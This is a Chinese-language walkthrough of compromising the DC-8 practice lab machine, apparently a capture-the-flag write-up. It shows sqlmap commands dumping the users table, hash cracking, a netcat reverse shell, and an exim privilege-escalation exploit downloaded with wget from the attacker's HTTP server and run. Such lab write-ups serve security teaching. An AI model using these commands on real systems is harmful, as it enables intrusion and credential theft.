渗透DC-8-靶机文件共享

0x00 环境介绍

靶机环境介绍，本次渗透DC系列dc-8，

0x01 信息收集

使用同一局域网内，使用kali协助渗透
1）IP收集----192.168.213.152

arp-scan -l

2）端口扫描-----80

nmap -A -p- 192.168.213.152

3）目录爆破------后台地址

dirb http://192.168.213.152

进入web页面完成下一步渗透

0x02 渗透测试

进入web页面观察到url疑似存在sql注入

使用sqlmap注入站点

sqlmap.py -u "http://192.168.213.152/?nid=3"
sqlmap -u  "http://192.168.213.152/?nid=3" -D d7db --tables --batch
sqlmap -u  "http://192.168.213.152/?nid=3" -D d7db -T users --column --batch
sqlmap -u  "http://192.168.213.152/?nid=3" -D d7db -T users -C uid,name,pass --dump

注入得到hash加密账户密码‘

将hash提取出来，使用kali的john解密，这里通过解发现admin无法解密出，只能将john解密

得到账户密码，使用之前爆破出来的后台地址，登录后台页面

开启搜集，发现到疑似存在命令执行的地方

尝试输入phpinfo运行，用随机账户登录查看效果

发现命令可以直接执行

下一步可以写入一句话木马连接，或者使用反弹shell
这里我推荐使用反弹shell，方便后期的操作
这里使用kail自带的nc-shell脚本，删除注释行，重新编辑IP地址和端口号

编辑内容，修改IP以及端口号

提前kali准备接受nc

nc -lnvp 1234

删除之前的phpinfo代码，将shell脚本写入，填入随机账户信息查看

反弹成功，使用交互shell获取命令行

0x03 权限提升

搜寻suid命令账户

find / -perm -u=s -a -type f 2> /dev/null

找到突破口，exim

搜寻exim版本号，该版本存在漏洞，

exim4 --version

使用search 寻找漏洞框架exp利用

searchsploit exim

下载报告查看
searchsploit -m 46996

vim查看发现编辑使用的dos，需要将文件里面内容转换格式

格式转换 因为dos里面分隔符号与kali编辑不同，所以需要转换格式

dos2unix 46996.sh

将文件传输到靶机，通过调用python模块实现
在当前文件目录开启外联

python -m SimpleHTTPServer  8080

靶机在tmp目录下进行下载接受，防止其他位子没有权限

wget http://192.168.213.129:8080/46996.sh

授权该文件，否则无法执行

调用脚本nc外联

./46996.sh -m netcat

并且使用下列端口反弹

kali提前接受端口，反弹即可，

权限提升完成，这里dc-8反弹后很容易断开连接，简介即使使用shell交互防止断开
这里渗透提权完毕